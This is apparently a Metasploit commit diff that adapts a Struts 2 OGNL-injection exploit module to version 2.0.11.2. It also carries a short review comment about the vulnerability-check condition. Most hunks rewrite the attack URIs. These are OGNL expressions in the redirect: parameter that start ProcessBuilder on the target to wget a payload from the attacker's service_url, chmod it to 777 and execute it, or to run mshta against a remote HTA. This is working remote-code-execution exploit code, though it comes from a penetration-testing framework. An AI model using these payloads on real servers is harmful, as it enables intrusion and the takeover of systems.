Land #2658 - Make OGNL expressions compatible with struts 2.0.11.2

sinn3r 2013-11-21 15:30:42 -06:00
commit 22c7703e8b
1 changed files with 9 additions and 9 deletions


@ -27,8 +27,8 @@ class Metasploit3 < Msf::Exploit::Remote
evaluated as OGNL expression against the value stack, this introduces the
possibility to inject server side code.
This module has been tested successfully on Struts 2.3.15 over Tomcat 7, with
Windows 2003 SP2 and Ubuntu 10.04 operating systems.
This module has been tested successfully on Struts 2.3.15 and Struts 2.0.11.2 over
Tomcat 7, with Windows 2003 SP2 and Ubuntu 10.04 operating systems.
},
'License' => MSF_LICENSE,
'Author' =>
@ -156,11 +156,11 @@ class Metasploit3 < Msf::Exploit::Remote
proof = rand_text_alpha(6 + rand(4))
res = send_request_cgi({
'uri' => "#{uri}?redirect:%25{new%20java.lang.String('#{proof}')}",
'uri' => "#{uri}?redirect:%24{new%20java.lang.String('#{proof}')}",
'method' => 'GET'
})
if res and res.code == 302 and res.headers['Location'] =~ /#{proof}/
if res and res.code == 302 and res.headers['Location'] =~ /#{proof}/ and res.headers['Location'] !~ /String/
return Exploit::CheckCode::Vulnerable
end
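Review bot: The added `!~ /String/` term on the check's verdict line carries no explanation of what it screens out, so a later maintainer cannot tell whether it is there to reject a response that merely echoes the unevaluated expression (which would still contain the literal `java.lang.String`) or to cover some other case. A one-line comment above the `if`, such as `# an unevaluated expression is reflected verbatim and still contains 'String'; only an evaluated one yields the bare proof`, would record the intent; phrase it as an assumption to confirm if that is not exactly the behaviour observed on 2.0.11.2. The check method continues past the hunk, so which verdict (Safe or Unknown) the reflected-but-not-evaluated response falls into is not visible here and is worth re-checking now that the condition has two parts, since a proof match alone no longer decides it.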
@ -181,7 +181,7 @@ class Metasploit3 < Msf::Exploit::Remote
proof = rand_text_alpha(6 + rand(4))
res = send_request_cgi({
'uri' => "#{uri}?redirect:%25{new%20java.io.File('.').getCanonicalPath().concat('#{proof}')}",
'uri' => "#{uri}?redirect:%24{new%20java.io.File('.').getCanonicalPath().concat('#{proof}')}",
'method' => 'GET'
})
@ -215,7 +215,7 @@ class Metasploit3 < Msf::Exploit::Remote
fname = "#{fname}/" unless fname =~ %r'/$'
fname << downfile
uri = normalize_uri(target_uri.path)
uri << "?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'wget','#{service_url}','-O',new%20java.lang.String('#{fname.gsub(/\//,"$")}').replace('$','\\u002f')})).start()}"
uri << "?redirect:%24{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'wget','#{service_url}','-O',new%20java.lang.String('#{fname.gsub(/\//,"$")}').replace('$','\\u002f')})).start()}"
print_status("#{rhost}:#{rport} - Downloading payload to #{fname}...")
@ -239,7 +239,7 @@ class Metasploit3 < Msf::Exploit::Remote
# chmod
#
uri = normalize_uri(target_uri.path)
uri << "?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'chmod','777',new%20java.lang.String('#{fname.gsub(/\//,"$")}').replace('$','\\u002f')})).start()}"
uri << "?redirect:%24{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'chmod','777',new%20java.lang.String('#{fname.gsub(/\//,"$")}').replace('$','\\u002f')})).start()}"
print_status("#{rhost}:#{rport} - Make payload executable...")
@ -256,7 +256,7 @@ class Metasploit3 < Msf::Exploit::Remote
# execute
#
uri = normalize_uri(target_uri.path)
uri << "?redirect:%25{(new%20java.lang.ProcessBuilder(new%20java.lang.String('#{fname.gsub(/\//,"$")}').replace('$','\\u002f'))).start()}"
uri << "?redirect:%24{(new%20java.lang.ProcessBuilder(new%20java.lang.String('#{fname.gsub(/\//,"$")}').replace('$','\\u002f'))).start()}"
print_status("#{rhost}:#{rport} - Execute payload...")
@ -285,7 +285,7 @@ class Metasploit3 < Msf::Exploit::Remote
# execute hta
#
uri = normalize_uri(target_uri.path)
uri << "?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'mshta',new%20java.lang.String('http:nn#{service_url}').replace('n','\\u002f')})).start()}"
uri << "?redirect:%24{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'mshta',new%20java.lang.String('http:nn#{service_url}').replace('n','\\u002f')})).start()}"
print_status("#{rhost}:#{rport} - Execute payload through malicious HTA...")